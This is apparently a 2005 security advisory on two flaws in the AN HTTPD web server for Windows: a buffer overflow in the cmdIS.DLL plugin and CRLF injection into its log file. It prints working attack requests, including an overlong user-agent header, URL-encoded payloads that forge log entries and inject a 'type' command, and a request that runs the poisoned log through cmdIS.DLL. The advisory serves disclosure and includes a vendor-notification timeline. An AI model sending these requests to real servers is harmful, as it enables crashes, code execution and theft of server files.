SIG^2 G-TEC - AN HTTPD Server cmdIS.DLL Buffer Overflow and LogFile Arbitrary Character Injection Vulnerabilities

Summary

AN HTTPD Server is a web server software for Windows 95/98/Me/NT/2000/XP platforms. It is easy to use and install, and supports SSI and CGI. It is suitable for anyone who wants to setup a personal homepage using one's home PC, and it works even over dial-up connections.

A buffer overflow vulnerability was found in the cmdIS.DLL plugin supplied with AN HTTPD. This vulnerability may be exploited to crash the server or to execute arbitrary code. In addition, AN HTTPD does not perform filtering of the received URI before writing it out to the logfile. Hence, it is possible to inject arbitrary characters into its logfile. This may be exploited to corrupt the logfile or to inject fake entries. In particular, it is may be possible to inject commands into the logfile that can be executed by the cmdIS.DLL plugin.

Tested System

AN HTTPD Server Version 1.42n on English Win2K SP4 and WinXP SP2.

Details

This advisory document two vulnerabilities found in AN HTTPD server. The first is a buffer overflow vulnerability that may be remotely exploited to crash the server or to execute arbitrary code. The second is a logfile arbitrary character injection vulnerability that may be exploited to corrupt the logfile, inject fake entries, or inject commands that can be executed by cmdIS.DLL.

AN HTTPD server supports the use of BAT files as CGI scripts. The cmdIS.DLL plugin that comes with AN HTTPD could be used to parse BAT files that are used as CGI scripts. cmdIS.DLL supports only a small subset of BAT file commands like echo, set, echo., @echo and type. In particular, the set command could be used in a CGI BAT file to display the Environment variables. Internally, cmdIS.DLL calls the GetEnvironmentStrings API to obtain the Environment variables. The results from the API call is copied into a buffer without bounds check. This causes a buffer overflow when the total size of the Enviroment variables exceed the size of the buffer.

Several Enviroment variables like HTTP_USER_AGENT, HTTP_HOST and HTTP_ACCEPT_ENCODING can be controlled directly by the attacker. i.e. The attacker may send an overly long string in the user-agent, host, or accept-encoding HTTP headers to increase the total size of the Environment variables, thus causing an overflow.

To exploit this vulnerability, there must be a BAT file on the server that uses the set command. cmdIS.DLL must also be accessible from the document root. The default installation of AN HTTPD includes the c:\httpd\cgi-bin\test.bat script that uses this command. cmdIS.DLL is accessible in c:\httpd\scripts\cmdIS.DLL, document root is c:\httpd. A sample request that uses cmdIS.DLL to parse test.bat (assuming default installation) is shown below. This request will trigger the overflow.


GET /scripts/cmdIS.dll/cgi-bin/test.bat HTTP/1.0
user-agent: aaaaaaaaaaaaaaaaaaaaaa [approx 8300 characters] aaaaaaaaaaaaaaaaaaaa...

The following screen capture shows EIP being overwritten. Exploitation is complicated by the fact that certain characters in the input buffer will be translated, thus corrupting the shellcode. This also limits the return addresses that could be used. However, non-translated version of the shellcode exists in memory and successful exploitation was achieved on WinXP using hardcoded return address.

In the event that test.bat does not exist, the logfile arbitrary character injection vulnerability (to be disclosed next) may be used to inject set commands into the log file, which can then be executed using cmdIS.DLL

AN HTTPD does not perform filtering of the received URI before writing it out to the logfile. This makes it possible to inject arbitrary characters into the logfile. In particular, it does not filter out CR and LF characters in the URI before logging the request. This may be exploited to corrupt the logfile or to inject fake entries. It is also possible to inject commands into the logfile that can be executed by the cmdIS.DLL plugin. The following HTTP request, when submitted to a vulnerable AN HTTPD server, will create a fictious log entry.


http://[hostname]/a%20HTTP/1.0"%20200%202048%0d%0a255.255.255.255%20-%20-%20[06/Mar/2005%3a22%3a31%3a11%20+0800]%20"GET%20/hack

The log entries that will be created are shown below. The line highlighted in red is the fake entry.


192.168.2.100 - - [06/Mar/2005:22:39:30 +0800] "GET /a HTTP/1.0" 200 2048
255.255.255.255 - - [06/Mar/2005:22:31:11 +0800] "GET /hack HTTP/1.0" 404 215

The default installation of AN HTTPD places this logfile (httpd.log) in the document root. This means that we can use cmdIS.DLL to parse and execute any commands injected into the logfile. The following HTTP request will inject the type command into the logfile.


http://[hostname]/%0d%0atype%20cgi-bin%5Ctest.bat


192.168.2.100 - - [06/Mar/2005:22:59:25 +0800] "GET /
type cgi-bin/test.bat HTTP/1.1" 404 211

If httpd.log is in the document root and cmdIS.DLL exists, then the following HTTP request could be used to parse and execute the injected type command. This will return the contents of test.bat. This may be exploited to steal the source code of any scripts or text files on the server. The buffer overflow vulnerability mentioned earily may also be exploited by injecting the set command into httpd.log and parsing it using the vulnerable cmdIS.DLL.


http://[hostname]/scripts/cmdIS.dll/httpd.log

Disclosure Timeline

06 Mar 05 - Vulnerability Discovered.
07 Mar 05 - Initial Author Notification.
12 Mar 05 - Second Author Notification.
20 Mar 05 - Third Author Notification.
05 Apr 05 - Fourth Author Notification.
07 Apr 05 - Author Acknowledged Vulnerabilities.
07 Apr 05 - Public Release